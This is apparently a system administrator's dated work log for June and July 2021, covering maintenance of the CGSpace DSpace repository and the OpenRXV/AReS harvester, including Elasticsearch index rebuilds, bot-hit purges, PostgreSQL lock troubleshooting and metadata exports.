+curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
+curl -XPUT 'http://localhost:9200/openrxv-items-final'
+curl -XPUT 'http://localhost:9200/openrxv-items-temp'
+curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
+elasticdump --input=/home/aorth/openrxv-items_mapping.json --output=http://localhost:9200/openrxv-items-final --type=mapping
+elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhost:9200/openrxv-items-final --type=data --limit=1000
+
    +
  • Then I started a harvesting on AReS
  • +
+

2021-06-07

+
    +
  • The harvesting on AReS completed successfully
  • +
  • Provide feedback to FAO on how we use AGROVOC for their “AGROVOC call for use cases”
  • +
+

2021-06-10

+
    +
  • Skype with Moayad to discuss AReS harvesting improvements +
      +
    • He will work on a plugin that reads the XML sitemap to get all item IDs and checks whether we have them or not
    • +
    +
  • +
+

2021-06-14

+
    +
  • Dump and re-create indexes on AReS (as above) so I can do a harvest
  • +
+

2021-06-16

+
    +
  • Looking at the Solr statistics on CGSpace for last month I see many requests from hosts using seemingly normal Windows browser user agents, but using the MSN bot’s DNS +
      +
    • For example, user agent Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0) with DNS msnbot-131-253-25-91.search.msn.com.
    • +
    • I queried Solr for all hits using the MSN bot DNS (dns:*msnbot* AND dns:*.msn.com.) and found 457,706
    • +
    • I extracted their IPs using Solr’s CSV format and ran them through my resolve-addresses.py script and found that they all belong to MICROSOFT-CORP-MSN-AS-BLOCK (AS8075) (the extraction is sketched after this list)
    • +
    • Note that Microsoft’s docs say that reverse lookups on Bingbot IPs will always have “search.msn.com” so it is safe to purge these as non-human traffic
    • +
    • I purged the hits with ilri/check-spider-ip-hits.sh (though I had to do it in 3 batches because I forgot to increase the facet.limit so I was only getting them 100 at a time)
    • +
    +
  • +
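  • Roughly how that IP extraction looks (a sketch; the real query presumably also had a date filter for last month, and a higher rows value if needed):

$ curl -s 'http://localhost:8081/solr/statistics/select?q=dns:*msnbot*+AND+dns:*.msn.com.&fl=ip&wt=csv&rows=500000' | sed 1d | sort -u > /tmp/msn-ips.txt
$ wc -l /tmp/msn-ips.txt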
  • Moayad sent a pull request a few days ago to re-work the harvesting on OpenRXV +
      +
    • It will hopefully also fix the duplicate and missing items issues
    • +
    • I had a Skype with him to discuss
    • +
    • I got it running on podman-compose, but I had to fix the storage permissions on the Elasticsearch volume after the first time it tries (and fails) to run:
    • +
    +
  • +
+
$ podman unshare chown 1000:1000 /home/aorth/.local/share/containers/storage/volumes/docker_esData_7/_data
+
    +
  • The new OpenRXV harvesting method by Moayad uses pages of 10 items instead of 100 and it’s much faster +
      +
    • I harvested 90,000+ items from DSpace Test in ~3 hours
    • +
    • There seem to be some issues with the health check step though, as I see it is requesting one restricted item 600,000+ times…
    • +
    +
  • +
+

2021-06-17

+
    +
  • I ported my ilri/resolve-addresses.py script that uses IPAPI.co to use the local GeoIP2 databases +
      +
    • The new script is ilri/resolve-addresses-geoip2.py and it is much faster and works offline with no API rate limits
    • +
    +
  • +
  • Teams meeting with the CGIAR Metadata Working group to discuss CGSpace and open repositories and the way forward
  • +
  • More work with Moayad on OpenRXV harvesting issues +
      +
    • Using a JSON export from elasticdump we debugged the duplicate checker plugin and found that there are indeed duplicates:
    • +
    +
  • +
+
$ grep -oE '"handle":"[[:digit:]]+/[[:digit:]]+"' openrxv-items_data.json | awk -F: '{print $2}' | wc -l
+90459
+$ grep -oE '"handle":"[[:digit:]]+/[[:digit:]]+"' openrxv-items_data.json | awk -F: '{print $2}' | sort | uniq | wc -l
+90380
+$ grep -oE '"handle":"[[:digit:]]+/[[:digit:]]+"' openrxv-items_data.json | awk -F: '{print $2}' | sort | uniq -c | sort -h
+...
+      2 "10568/99409"
+      2 "10568/99410"
+      2 "10568/99411"
+      2 "10568/99516"
+      3 "10568/102093"
+      3 "10568/103524"
+      3 "10568/106664"
+      3 "10568/106940"
+      3 "10568/107195"
+      3 "10568/96546"
+

2021-06-20

+
    +
  • Udana asked me to update their IWMI subjects from farmer managed irrigation systems to farmer-led irrigation +
      +
    • First I extracted the IWMI community from CGSpace:
    • +
    +
  • +
+
$ dspace metadata-export -i 10568/16814 -f /tmp/2021-06-20-IWMI.csv
+
    +
  • Then I used csvcut to extract just the columns I needed and do the replacement into a new CSV:
  • +
+
$ csvcut -c 'id,dcterms.subject[],dcterms.subject[en_US]' /tmp/2021-06-20-IWMI.csv | sed 's/farmer managed irrigation systems/farmer-led irrigation/' > /tmp/2021-06-20-IWMI-new-subjects.csv
+
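  • A quick sanity check on the replacement before uploading might look like this (a sketch; the first count should be zero and the second non-zero):

$ grep -c 'farmer managed irrigation systems' /tmp/2021-06-20-IWMI-new-subjects.csv
$ grep -c 'farmer-led irrigation' /tmp/2021-06-20-IWMI-new-subjects.csv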
    +
  • Then I uploaded the resulting CSV to CGSpace, updating 161 items
  • +
  • Start a harvest on AReS
  • +
  • I found a bug and a patch for the private items showing up in the DSpace sitemap bug +
      +
    • The fix is super simple, I should try to apply it
    • +
    +
  • +
+

2021-06-21

+
    +
  • The AReS harvesting finished, but the indexes got messed up again
  • +
  • I was looking at the JSON export I made yesterday and trying to understand the situation with duplicates +
      +
    • We have 90,000+ items, but only 85,000 unique:
    • +
    +
  • +
+
$ grep -E '"repo":"CGSpace"' openrxv-items_data.json | grep -oE '"handle":"[[:digit:]]+/[[:alnum:]]+"' | wc -l
+90937
+$ grep -E '"repo":"CGSpace"' openrxv-items_data.json | grep -oE '"handle":"[[:digit:]]+/[[:alnum:]]+"' | sort -u | wc -l
+85709
+
    +
  • So those could be duplicates from the way we harvest pages, but they could also be from mappings… +
      +
    • Manually inspecting the duplicates where handles appear more than once:
    • +
    +
  • +
+
$ grep -E '"repo":"CGSpace"' openrxv-items_data.json | grep -oE '"handle":"[[:digit:]]+/[[:alnum:]]+"' | sort | uniq -c | sort -h
+
    +
  • Unfortunately I found no pattern: +
      +
    • Some appear twice in the Elasticsearch index, but appear in only one collection
    • +
    • Some appear twice in the Elasticsearch index, and appear in two collections
    • +
    • Some appear twice in the Elasticsearch index, but appear in three collections (!)
    • +
    +
  • +
  • So really we need to just check whether a handle exists before we insert it
  • +
  • I tested the pull request for DS-1977 that adjusts the sitemap generation code to exclude private items +
      +
    • It applies cleanly and seems to work, but we don’t actually have any private items
    • +
    • The issue we are having with AReS hitting restricted items in the sitemap is that the items have restricted metadata, not that they are private
    • +
    +
  • +
  • Testing the pull request for DS-4065 where the REST API’s /rest/items endpoint is not aware of private items and returns an incorrect number of items +
      +
    • This is most easily seen by setting a low limit in /rest/items, making one of the items private, and requesting items again with the same limit
    • +
    • I confirmed the issue on the current DSpace 6 Demo:
    • +
    +
  • +
+
$ curl -s -H "Accept: application/json" "https://demo.dspace.org/rest/items?offset=0&limit=5" | jq length
+5
+$ curl -s -H "Accept: application/json" "https://demo.dspace.org/rest/items?offset=0&limit=5" | jq '.[].handle'
+"10673/4"
+"10673/3"
+"10673/6"
+"10673/5"
+"10673/7"
+# log into DSpace Demo XMLUI as admin and make one item private (for example 10673/6)
+$ curl -s -H "Accept: application/json" "https://demo.dspace.org/rest/items?offset=0&limit=5" | jq length       
+4
+$ curl -s -H "Accept: application/json" "https://demo.dspace.org/rest/items?offset=0&limit=5" | jq '.[].handle' 
+"10673/4"
+"10673/3"
+"10673/5"
+"10673/7"
+
    +
  • I tested the pull request on DSpace Test and it works, so I left a note on GitHub and Jira
  • +
  • Last week I noticed that the Gender Platform website is using “cgspace.cgiar.org” links for CGSpace, instead of handles +
      +
    • I emailed Fabio and Marianne to ask them to please use the Handle links
    • +
    +
  • +
  • I tested the pull request for DS-4271 where Discovery filters of type “contains” don’t work as expected when the user’s search term has spaces +
      +
    • I tested with filter “farmer managed irrigation systems” on DSpace Test
    • +
    • Before the patch I got 293 results, and the few I checked didn’t have the expected metadata value
    • +
    • After the patch I got 162 results, and all the items I checked had the exact metadata value I was expecting
    • +
    +
  • +
  • I tested a fresh harvest from my local AReS on DSpace Test with the DS-4065 REST API patch and here are my results: +
      +
    • 90459 in final from last harvesting
    • +
    • 90307 in temp after new harvest
    • +
    • 90327 in temp after start plugins
    • +
    +
  • +
  • The 90327 number seems closer to the “real” number of items on CGSpace… +
      +
    • Seems close, but not entirely correct yet:
    • +
    +
  • +
+
$ grep -oE '"handle":"[[:digit:]]+/[[:digit:]]+"' openrxv-items_data-local-ds-4065.json | wc -l
+90327
+$ grep -oE '"handle":"[[:digit:]]+/[[:digit:]]+"' openrxv-items_data-local-ds-4065.json | sort -u | wc -l
+90317
+

2021-06-22

+
    +
  • Make a pull request to the COUNTER-Robots project to add two new user agents: crusty and newspaper +
      +
    • These two bots have made ~3,000 requests on CGSpace
    • +
    • Then I added them to our local bot override in CGSpace (until the above pull request is merged) and ran my bot checking script:
    • +
    +
  • +
+
$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p   
+Purging 1339 hits from RI\/1\.0 in statistics
+Purging 447 hits from crusty in statistics
+Purging 3736 hits from newspaper in statistics
+
+Total number of bot hits purged: 5522
+
    +
  • Surprised to see RI/1.0 in there because it’s been in the override file for a while
  • +
  • Looking at the 2021 statistics in Solr I see a few more suspicious user agents: +
      +
    • PostmanRuntime/7.26.8
    • +
    • node-fetch/1.0 (+https://github.com/bitinn/node-fetch)
    • +
    • Photon/1.0
    • +
    • StatusCake_Pagespeed_indev
    • +
    • node-superagent/3.8.3
    • +
    • cortex/1.0
    • +
    +
  • +
  • These bots account for ~42,000 hits in our statistics… I will just purge them and add them to our local override, but I can’t be bothered to submit them to COUNTER-Robots since I’d have to look up the information for each one
  • +
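  • For reference, roughly how I add patterns to our local override file before purging (a sketch; the entries are regex patterns, matching how RI/1.0 appears escaped in the script output above, and I would likely drop the version numbers):

$ cat >> dspace/config/spiders/agents/ilri <<'EOF'
PostmanRuntime
node-fetch
Photon\/1\.0
StatusCake_Pagespeed_indev
node-superagent
cortex\/1\.0
EOF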
  • I re-synced DSpace Test (linode26) with the assetstore, Solr statistics, and database from CGSpace (linode18)
  • +
+

2021-06-23

+
    +
  • I woke up this morning to find CGSpace down +
      +
    • The logs show a high number of abandoned PostgreSQL connections and locks:
    • +
    +
  • +
+
# journalctl --since=today -u tomcat7 | grep -c 'Connection has been abandoned'
+978
+$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
+10100
+
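  • A slightly more informative view of the same problem (a sketch; grouping the sessions by state makes idle or idle-in-transaction connections stand out):

$ psql -c 'SELECT state, count(*) FROM pg_stat_activity GROUP BY state ORDER BY 2 DESC;'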
    +
  • I sent a message to Atmire, hoping that the database logging stuff they put in place last time this happened will be of help now
  • +
  • In the mean time, I decided to upgrade Tomcat from 7.0.107 to 7.0.109, and the PostgreSQL JDBC driver from 42.2.20 to 42.2.22 (first on DSpace Test)
  • +
  • I also applied the following patches from the 6.4 milestone to our 6_x-prod branch: +
      +
    • DS-4065: resource policy aware REST API hibernate queries
    • +
    • DS-4271: Replaced brackets with double quotes in SolrServiceImpl
    • +
    +
  • +
  • After upgrading and restarting Tomcat the database connections and locks were back down to normal levels:
  • +
+
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
+63
+
    +
  • Looking in the DSpace log, the first “pool empty” message I saw this morning was at 4AM:
  • +
+
2021-06-23 04:01:14,596 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ [http-bio-127.0.0.1-8443-exec-4323] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:250; busy:250; idle:0; lastwait:5000].
+
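  • For reference, finding the first such error of the day is just a grep against that day’s log (assuming the same dspace.log.YYYY-MM-DD naming used elsewhere in these notes):

$ grep -m 1 'Pool empty' dspace.log.2021-06-23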
    +
  • Oh, and I notice 8,000 hits from a Flipboard bot using this user-agent:
  • +
+
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0 (FlipboardProxy/1.2; +http://flipboard.com/browserproxy)
+
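  • A rough way to count its requests from the nginx side (a sketch; the Solr hit count will differ):

# zcat --force /var/log/nginx/access.log* | grep -c 'FlipboardProxy'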
+

2021-06-24

+
    +
  • I deployed the new OpenRXV code on CGSpace but I’m having problems with the indexing, something about missing the mappings on the openrxv-items-temp index +
      +
    • I extracted the mappings from my local instance using elasticdump and after putting them on CGSpace I was able to harvest…
    • +
    • But still, there are way too many duplicates and I’m not sure what the actual number of items should be
    • +
    • According to the OAI ListRecords for each of our repositories, we should have about: +
        +
      • MELSpace: 9537
      • +
      • WorldFish: 4483
      • +
      • CGSpace: 91305
      • +
      • Total: 105325
      • +
      +
    • +
    • Looking at the last backup I have from harvesting before these changes we have 104,000 total handles, but only 99186 unique:
    • +
    +
  • +
+
$ grep -oE '"handle":"([[:digit:]]|\.)+/[[:digit:]]+"' cgspace-openrxv-items-temp-backup.json | wc -l
+104797
+$ grep -oE '"handle":"([[:digit:]]|\.)+/[[:digit:]]+"' cgspace-openrxv-items-temp-backup.json | sort | uniq | wc -l
+99186
+
    +
  • This number is probably unique for that particular harvest, but I don’t think it represents the true number of items…
  • +
  • The harvest of DSpace Test I did on my local test instance yesterday has about 91,000 items:
  • +
+
$ grep -E '"repo":"DSpace Test"' 2021-06-23-openrxv-items-final-local.json | grep -oE '"handle":"([[:digit:]]|\.)+/[[:digit:]]+"' | sort | uniq | wc -l
+90990
+
    +
  • If the harvest on the live site is missing items, then why didn’t the add missing items plugin find them?! +
      +
    • I notice that we are missing the type in the metadata structure config for each repository on the production site, and we are using type for item type in the actual schema… so maybe there is a conflict there
    • +
    • I will rename type to item_type and add it back to the metadata structure
    • +
    • The add missing items definitely checks this field…
    • +
    • I modified my local backup to add type: item and uploaded it to the temp index on production
    • +
    • Oh! nginx is blocking OpenRXV’s attempt to read the sitemap:
    • +
    +
  • +
+
172.104.229.92 - - [24/Jun/2021:07:52:58 +0200] "GET /sitemap HTTP/1.1" 503 190 "-" "OpenRXV harvesting bot; https://github.com/ilri/OpenRXV"
+
    +
  • I fixed nginx so it always allows people to get the sitemap and then re-ran the plugins… now it’s checking 180,000+ handles to see if they are collections or items… +
      +
    • I see it fetched the sitemap three times, we need to make sure it’s only doing it once for each repository
    • +
    +
  • +
  • According to the api logs we will be adding 5,697 items:
  • +
+
$ docker logs api 2>/dev/null | grep dspace_add_missing_items | sort | uniq | wc -l
+5697
+
    +
  • Spent a few hours with Moayad troubleshooting and improving OpenRXV +
      +
    • We found a bug in the harvesting code that can occur when you are harvesting DSpace 5 and DSpace 6 instances, as DSpace 5 uses numeric (long) IDs, and DSpace 6 uses UUIDs
    • +
    +
  • +
+

2021-06-25

+
    +
  • The new OpenRXV code creates almost 200,000 jobs when the plugins start +
      +
    • I figured out how to use bee-queue/arena to view our Bull job queue
    • +
    • Also, we can see the jobs directly using redis-cli:
    • +
    +
  • +
+
$ redis-cli
+127.0.0.1:6379> SCAN 0 COUNT 5
+1) "49152"
+2) 1) "bull:plugins:476595"
+   2) "bull:plugins:367382"
+   3) "bull:plugins:369228"
+   4) "bull:plugins:438986"
+   5) "bull:plugins:366215"
+
    +
  • We can apparently get the names of the jobs in each hash using hget:
  • +
+
127.0.0.1:6379> TYPE bull:plugins:401827
+hash
+127.0.0.1:6379> HGET bull:plugins:401827 name
+"dspace_add_missing_items"
+
    +
  • I whipped up a one-liner to get the keys for all plugin jobs, convert them to redis HGET commands that extract the value of the name field, and then sort the names by their counts:
  • +
+
$ redis-cli KEYS "bull:plugins:*" \
+  | sed -e 's/^bull/HGET bull/' -e 's/\([[:digit:]]\)$/\1 name/' \
+  | ncat -w 3 localhost 6379 \
+  | grep -v -E '^\$' | sort | uniq -c | sort -h
+      3 dspace_health_check
+      4 -ERR wrong number of arguments for 'hget' command
+     12 mel_downloads_and_views
+    129 dspace_altmetrics
+    932 dspace_downloads_and_views
+ 186428 dspace_add_missing_items
+
    +
  • Note that this uses ncat to send commands directly to redis all at once instead of one at a time (netcat didn’t work here, as it doesn’t know when our input is finished and never quits) +
      +
    • I thought of using redis-cli --pipe but then you have to construct the commands in the redis protocol format with the number of args and length of each command
    • +
    +
  • +
  • There is clearly something wrong with the new dspace_add_missing_items plugin, as it creates WAY too many jobs every time we run the plugins
  • +
+
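  • For reference, a slower but simpler alternative to the ncat trick above is to just call redis-cli once per key (fine for a few thousand keys, painful for 186,000):

$ redis-cli KEYS "bull:plugins:*" | xargs -I{} redis-cli HGET {} name | sort | uniq -c | sort -h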

2021-06-27

+
    +
  • Looking into the spike in PostgreSQL connections last week +
      +
    • I see the same things that I always see (large number of connections waiting for lock, large number of threads, high CPU usage, etc), but I also see almost 10,000 DSpace sessions on 2021-06-25
    • +
    +
  • +
+

DSpace sessions

+
    +
  • Looking at the DSpace log I see there was definitely a higher number of sessions that day, perhaps twice the normal:
  • +
+
$ for file in dspace.log.2021-06-[12]*; do echo "$file"; grep -oE 'session_id=[A-Z0-9]{32}' "$file" | sort | uniq | wc -l; done
+dspace.log.2021-06-10
+19072
+dspace.log.2021-06-11
+19224
+dspace.log.2021-06-12
+19215
+dspace.log.2021-06-13
+16721
+dspace.log.2021-06-14
+17880
+dspace.log.2021-06-15
+12103
+dspace.log.2021-06-16
+4651
+dspace.log.2021-06-17
+22785
+dspace.log.2021-06-18
+21406
+dspace.log.2021-06-19
+25967
+dspace.log.2021-06-20
+20850
+dspace.log.2021-06-21
+6388
+dspace.log.2021-06-22
+5945
+dspace.log.2021-06-23
+46371
+dspace.log.2021-06-24
+9024
+dspace.log.2021-06-25
+12521
+dspace.log.2021-06-26
+16163
+dspace.log.2021-06-27
+5886
+
    +
  • I see 15,000 unique IPs in the XMLUI logs alone on that day:
  • +
+
# zcat /var/log/nginx/access.log.5.gz /var/log/nginx/access.log.4.gz | grep '23/Jun/2021' | awk '{print $1}' | sort | uniq | wc -l
+15835
+
    +
  • Annoyingly I found 37,000 more hits from Bing using dns:*msnbot* AND dns:*.msn.com. as a Solr filter +
      +
    • WTF, they are using a normal user agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
    • +
    • I will purge the IPs and add this user agent to the nginx config so that we can rate limit it
    • +
    +
  • +
  • I signed up for Bing Webmaster Tools and verified cgspace.cgiar.org with the BingSiteAuth.xml file +
      +
    • Also I adjusted the nginx config to explicitly allow access to robots.txt even when bots are rate limited
    • +
    • Also I found that Bing was auto discovering all our RSS and Atom feeds as “sitemaps” so I deleted 750 of them and submitted the real sitemap
    • +
    • I need to see if I can adjust the nginx config further to map the bot user agent to DNS like msnbot…
    • +
    +
  • +
  • Review Abdullah’s filter on click pull request +
      +
    • I rebased his code on the latest master branch and tested adding filter on click to the map and list components, and it works fine
    • +
    • There seems to be a bug that breaks scrolling on the page though…
    • +
    • Abdullah fixed the bug in the filter on click branch
    • +
    +
  • +
+

2021-06-28

+
    +
  • Some work on OpenRXV +
      +
    • Integrate prettier into the frontend and backend and format everything on the master branch
    • +
    • Re-work the GitHub Actions workflow for frontend and add one for backend
    • +
    • The workflows run npm install to test dependencies, and npm ci with prettier to check formatting
    • +
    • Also I merged Abdullah’s filter on click pull request
    • +
    +
  • +
+

2021-06-30

+
    +
  • CGSpace is showing a blank white page… +
      +
    • The status is HTTP 200, but it’s blank white… so UptimeRobot didn’t send a notification!
    • +
    +
  • +
  • The DSpace log shows:
  • +
+
2021-06-30 08:19:15,874 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ Cannot get a connection, pool error Timeout waiting for idle object
+
    +
  • The first one of these I see is from last night at 2021-06-29 at 10:47 PM
  • +
  • I restarted Tomcat 7 and CGSpace came back up…
  • +
  • I didn’t see that Atmire had responded last week (on 2021-06-23) about the issues we had +
      +
    • He said they had to do the same thing that they did last time: switch to the postgres user and kill all activity
    • +
    • He said they found tons of connections to the REST API, like 3-4 per second, and asked if that was normal
    • +
    • I pointed him to our Tomcat server.xml configuration, saying that we purposefully isolated the Tomcat connection pools between the API and XMLUI for this purpose…
    • +
    +
  • +
  • Export a list of all CGSpace’s AGROVOC keywords with counts for Enrico and Elizabeth Arnaud to discuss with AGROVOC:
  • +
+
localhost/dspace63= > \COPY (SELECT DISTINCT text_value AS "dcterms.subject", count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id = 187 GROUP BY "dcterms.subject" ORDER BY count DESC) to /tmp/2021-06-30-agrovoc.csv WITH CSV HEADER;
+COPY 20780
+
    +
  • Actually Enrico wanted NON AGROVOC, so I extracted all the center and CRP subjects (ignoring system office and themes):
  • +
+
localhost/dspace63= > \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242) GROUP BY subject ORDER BY count DESC) to /tmp/2021-06-30-non-agrovoc.csv WITH CSV HEADER;
+COPY 1710
+
    +
  • Fix an issue in the Ansible infrastructure playbooks for the DSpace role +
      +
    • It was causing the template module to fail when setting up the npm environment
    • +
    • We needed to install acl so that Ansible can use setfacl on the target file before becoming an unprivileged user
    • +
    +
  • +
  • I saw a strange message in the Tomcat 7 journal on DSpace Test (linode26):
  • +
+
Jun 30 16:00:09 linode26 tomcat7[30294]: WARNING: Creation of SecureRandom instance for session ID generation using [SHA1PRNG] took [111,733] milliseconds.
+
    +
  • What’s even crazier is that it is twice that on CGSpace (linode18)!
  • +
  • Apparently OpenJDK defaults to using /dev/random (see /etc/java-8-openjdk/security/java.security):
  • +
+
securerandom.source=file:/dev/urandom
+
    +
  • /dev/random blocks and can take a long time to get entropy, and urandom on modern Linux is a cryptographically secure pseudorandom number generator +
      +
    • Now Tomcat starts much faster and no warning is printed so I’m going to add this to our Ansible infrastructure playbooks
    • +
    +
  • +
  • Interesting resource about the lore behind the /dev/./urandom workaround that is posted all over the Internet, apparently due to a bug in early JVMs: https://bugs.java.com/bugdatabase/view_bug.do?bug_id=6202721
  • +
  • I’m experimenting with using PgBouncer for pooling instead of Tomcat’s JDBC
  • +
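  • Related to the SecureRandom delays above: a quick way to check how much entropy the kernel has available (low values are what make /dev/random block):

$ cat /proc/sys/kernel/random/entropy_avail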

July, 2021


2021-07-01

+
    +
  • Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:
  • +
+
localhost/dspace63= > \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
+COPY 20994
+

2021-07-04

+
    +
  • Update all Docker containers on the AReS server (linode20) and rebuild OpenRXV:
  • +
+
$ cd OpenRXV
+$ docker-compose -f docker/docker-compose.yml down
+$ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
+$ docker-compose -f docker/docker-compose.yml build
+
    +
  • Then run all system updates and reboot the server
  • +
  • After the server came back up I cloned the openrxv-items-final index to openrxv-items-temp and started the plugins +
      +
    • This will hopefully be faster than a full re-harvest…
    • +
    +
  • +
  • I opened a few GitHub issues for OpenRXV bugs: + +
  • +
  • Rebuild DSpace Test (linode26) from a fresh Ubuntu 20.04 image on Linode
  • +
  • The start plugins on AReS had seventy-five errors from the dspace_add_missing_items plugin for some reason so I had to start a fresh indexing
  • +
  • I noticed that the WorldFish data has dozens of incorrect countries so I should talk to Salem about that because they manage it +
      +
    • Also I noticed that we weren’t using the Country formatter in OpenRXV for the WorldFish country field, so some values don’t get mapped properly
    • +
    • I added some value mappings to fix some issues with WorldFish data and added a few more fields to the repository harvesting config and started a fresh re-indexing
    • +
    +
  • +
+

2021-07-05

+
    +
  • The AReS harvesting last night succeeded and I started the plugins
  • +
  • Margarita from CCAFS asked if we can create a new field for AICCRA publications +
      +
    • I asked her to clarify what they want
    • +
    • AICCRA is an initiative so it might be better to create new field for that, for example cg.contributor.initiative
    • +
    +
  • +
+

2021-07-06

+
    +
  • Atmire merged my spider user agent changes from last month so I will update the example list we use in DSpace and remove the new ones from my ilri override file +
      +
    • Also, I concatenated all our user agents into one file and purged all hits:
    • +
    +
  • +
+
$ ./ilri/check-spider-hits.sh -f /tmp/spiders -p
+Purging 95 hits from Drupal in statistics
+Purging 38 hits from DTS Agent in statistics
+Purging 601 hits from Microsoft Office Existence Discovery in statistics
+Purging 51 hits from Site24x7 in statistics
+Purging 62 hits from Trello in statistics
+Purging 13574 hits from WhatsApp in statistics
+Purging 144 hits from FlipboardProxy in statistics
+Purging 37 hits from LinkWalker in statistics
+Purging 1 hits from [Ll]ink.?[Cc]heck.? in statistics
+Purging 427 hits from WordPress in statistics
+
+Total number of bot hits purged: 15030
+
    +
  • Meet with the CGIAR–AGROVOC task group to discuss how we want to do the workflow for submitting new terms to AGROVOC
  • +
  • I extracted another list of all subjects to check against AGROVOC:
  • +
+
\COPY (SELECT DISTINCT(LOWER(text_value)) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-06-all-subjects.csv WITH CSV HEADER;
+$ csvcut -c 1 /tmp/2021-07-06-all-subjects.csv | sed 1d > /tmp/2021-07-06-all-subjects.txt
+$ ./ilri/agrovoc-lookup.py -i /tmp/2021-07-06-all-subjects.txt -o /tmp/2021-07-06-agrovoc-results-all-subjects.csv -d
+
    +
  • Test Hrafn Malmquist’s proposed DBCP2 changes for DSpace 6.4 (DS-4574) +
      +
    • His changes reminded me that we can perhaps switch back to using this pooling instead of Tomcat 7’s JDBC pooling via JNDI
    • +
    • Tomcat 8 has DBCP2 built in, but we are stuck on Tomcat 7 for now
    • +
    +
  • +
  • Looking into the database issues we had last month on 2021-06-23 +
      +
    • I think it might have been some kind of attack because the number of XMLUI sessions was through the roof at one point (10,000!) and the number of unique IPs accessing the server that day is much higher than any other day:
    • +
    +
  • +
+
# for num in {10..26}; do echo "2021-06-$num"; zcat /var/log/nginx/access.log.*.gz /var/log/nginx/library-access.log.*.gz | grep "$num/Jun/2021" | awk '{print $1}' | sort | uniq | wc -l; done
+2021-06-10
+10693
+2021-06-11
+10587
+2021-06-12
+7958
+2021-06-13
+7681
+2021-06-14
+12639
+2021-06-15
+15388
+2021-06-16
+12245
+2021-06-17
+11187
+2021-06-18
+9684
+2021-06-19
+7835
+2021-06-20
+7198
+2021-06-21
+10380
+2021-06-22
+10255
+2021-06-23
+15878
+2021-06-24
+9963
+2021-06-25
+9439
+2021-06-26
+7930
+
    +
  • Similarly, the number of connections to the REST API was around the average for the recent weeks before:
  • +
+
# for num in {10..26}; do echo "2021-06-$num"; zcat /var/log/nginx/rest.*.gz | grep "$num/Jun/2021" | awk '{print $1}' | sort | uniq | wc -l; done
+2021-06-10
+1183
+2021-06-11
+1074
+2021-06-12
+911
+2021-06-13
+892
+2021-06-14
+1320
+2021-06-15
+1257
+2021-06-16
+1208
+2021-06-17
+1119
+2021-06-18
+965
+2021-06-19
+985
+2021-06-20
+854
+2021-06-21
+1098
+2021-06-22
+1028
+2021-06-23
+1375
+2021-06-24
+1135
+2021-06-25
+969
+2021-06-26
+904
+
    +
  • According to goaccess, the traffic spike started at 2AM (remember that the first “Pool empty” error in dspace.log was at 4:01AM):
  • +
+
# zcat /var/log/nginx/access.log.1[45].gz /var/log/nginx/library-access.log.1[45].gz | grep -E '23/Jun/2021' | goaccess --log-format=COMBINED -
+
    +
  • Moayad sent a fix for the add missing items plugins issue (#107) +
      +
    • It works MUCH faster because it correctly identifies the missing handles in each repository
    • +
    • Also it adds better debug messages to the api logs
    • +
    +
  • +
+

2021-07-08

+
    +
  • Atmire plans to debug the database connection issues on CGSpace (linode18) today so they asked me to make the REST API inaccessible for today and tomorrow +
      +
    • I adjusted nginx to give an HTTP 403 as well as an error message to contact me
    • +
    +
  • +
+

2021-07-11

+
    +
  • Start an indexing on AReS
  • +
+

2021-07-17

+
    +
  • I’m in Cyprus mostly offline, but I noticed that CGSpace was down +
      +
    • I checked and there was a blank white page with HTTP 200
    • +
    • There are thousands of locks in PostgreSQL:
    • +
    +
  • +
+
postgres@linode18:~$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
+2302
+postgres@linode18:~$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
+2564
+postgres@linode18:~$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
+2530
+
    +
  • The locks are held by XMLUI, not REST API or OAI:
  • +
+
postgres@linode18:~$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi)' | sort | uniq -c | sort -n
+     57 dspaceApi
+   2671 dspaceWeb
+
    +
  • I ran all updates on the server (linode18) and restarted it, then DSpace came back up
  • +
  • I sent a message to Atmire, as I never heard from them last week when we blocked access to the REST API for two days for them to investigate the server issues
  • +
  • Clone the openrxv-items-temp index on AReS and re-run all the plugins, but most of the “dspace_add_missing_items” tasks failed so I will just run a full re-harvest
  • +
